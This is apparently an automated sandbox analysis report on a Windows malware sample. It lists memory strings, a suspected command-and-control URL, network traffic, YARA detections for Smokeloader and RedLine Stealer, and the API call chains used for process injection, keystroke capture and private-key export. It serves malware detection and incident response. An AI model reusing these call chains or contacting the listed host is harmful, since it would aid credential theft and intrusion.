      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.000000000345A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/
      Source: explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/earch.php
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.php
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com:443/search.phpge
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
      Source: unknown | Network traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknown | Network traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknown | Network traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknown | Network traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50067
      Source: unknown | Network traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50067 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknown | Network traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknown | Network traffic detected: HTTP traffic on port 50063 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknown | Network traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknown | Network traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknown | Network traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknown | Network traffic detected: HTTP traffic on port 50065 -> 443
      Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49760 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49882 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49890 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49898 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49902 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49913 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49919 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49925 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49931 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49941 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49948 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49954 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49960 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49966 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49972 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49978 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49984 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49994 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50007 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50013 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50050 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match | File source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F2162B GetKeyboardState,ToUnicode,19_2_02F2162B
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF7327A3220

      System Summary

      Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401514
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00402F97 RtlCreateUserThread,NtTerminateProcess,6_2_00402F97
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401542
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00403247 NtTerminateProcess,GetModuleHandleA,6_2_00403247
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401549
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_0040324F NtTerminateProcess,GetModuleHandleA,6_2_0040324F
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00403256 NtTerminateProcess,GetModuleHandleA,6_2_00403256
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401557
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_0040326C NtTerminateProcess,GetModuleHandleA,6_2_0040326C
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00403277 NtTerminateProcess,GetModuleHandleA,6_2_00403277
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,6_2_004032C7
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FE
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00403290 NtTerminateProcess,GetModuleHandleA,6_2_00403290
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00403103 RtlCreateUserThread,NtTerminateProcess,7_2_00403103
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_004014FB LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014FB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401641
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00403257 RtlCreateUserThread,NtTerminateProcess,7_2_00403257
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401606
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401613
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401627
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015FB
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F4B92 RtlMoveMemory,NtUnmapViewOfSection,12_2_030F4B92
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F33C3 NtQueryInformationFile,12_2_030F33C3
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F342B NtQueryObject,NtQueryObject,RtlMoveMemory,12_2_030F342B
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,12_2_030F349B
